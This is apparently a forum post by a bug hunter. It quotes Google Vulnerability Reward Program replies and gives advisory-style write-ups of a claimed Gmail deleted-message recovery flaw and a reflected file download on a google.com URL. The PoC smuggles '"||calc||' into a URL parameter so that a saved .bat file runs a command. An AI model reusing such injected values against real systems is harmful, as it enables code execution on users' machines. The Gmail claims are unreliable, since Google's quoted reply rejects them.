Hoseinroot

ویدئو [Hidden Content] بعضی از مکاتبات Hey, Thanks for the bug report. We analyzed it, but there are still some areas we don't understand fully. How could this be used in the attack against other users? Please write a more detailed attack scenario - we have prepared some tips on how to create one on this page. Thanks a lot in advance! How did we do? Please fill out a short anonymous survey to help Google Vulnerability Reward Program get better. Rgds ==================== Michal ================ when user clear message from inbox- and clear message from trash .our users want message deelted for ever. but not deleted and easy recovery when gmail is hacked . attacker ecan asly bruteforce vertification code by creat large table from small alpha and numbers and recovery secure message is deleted Google Security Team ===================== Hi Ali, Thanks for your report. You can't easily brute force the code. The other part (that the code is still valid after you delete the email) is working as intended. Regards, Martin, Google Security Team البته میدونید که اسم بنده علی نیست

سلام گوگل راجه به این موضوعات با من مکاتبه میکنه ولی متاسفانه ثبت نمیشه ولی کاملا واضح است ضعف امنیتی و سوئ استفاده ای که میشه کرد در پستای بعدی فیلم و بعضی از مکاتباتم رو میزارم # csrf recovery message in gmail # Risk: high # Version: All # Date: August - September 2017 # Author: Hosein)root # Tested on windows; Mozilla Firefox 54 # Vulnerable File: [Hidden Content] #explain vulnerability: #when you enter to email in inbox you have vertification code 15e2ebb2438ce504 after inbox/ we save this code #when user clear message from inbox- and clear message from trash .our users want message deelted for ever. but not deleted and easy recovery #when gmail is hacked . #attacker can easly bruteforce vertification code by creat large table from small alpha and numbers and recovery secure message is deleted #######

for first i show new bug in cyber world from google.com # reflected download execute command google.com # Risk: high # Version: All # Date: 11/11/2017 # Author: Hosein)root # Tested on windows; Mozilla Firefox 54 # Vulnerable File: ?file=1 # Exploit: [+] google.com/uds/?file=1&v=1&packages=geochart # PoC:link [+] google.com/uds/?file="||calc||&v=1&packages=geochart 2.input file= have vulnerability . first change ?file=1 to ?file=calc #first test and load page now save page as a bat file now run bat file and see nothing #second test we change ?file=1 to ?file=||calc|| and load page now save page as a bat file now run bat file and see nothing #third test we change ?file=1 to ?file="||calc|| and load page now save page as a bat file now run bat file and see execute calculator with cmd # by this message C:\Users\??\Desktop>var error = new Error("Module: '\" || calc || ' not found!"); #video youtu.be/gOxt2Ip6sBo # Thank's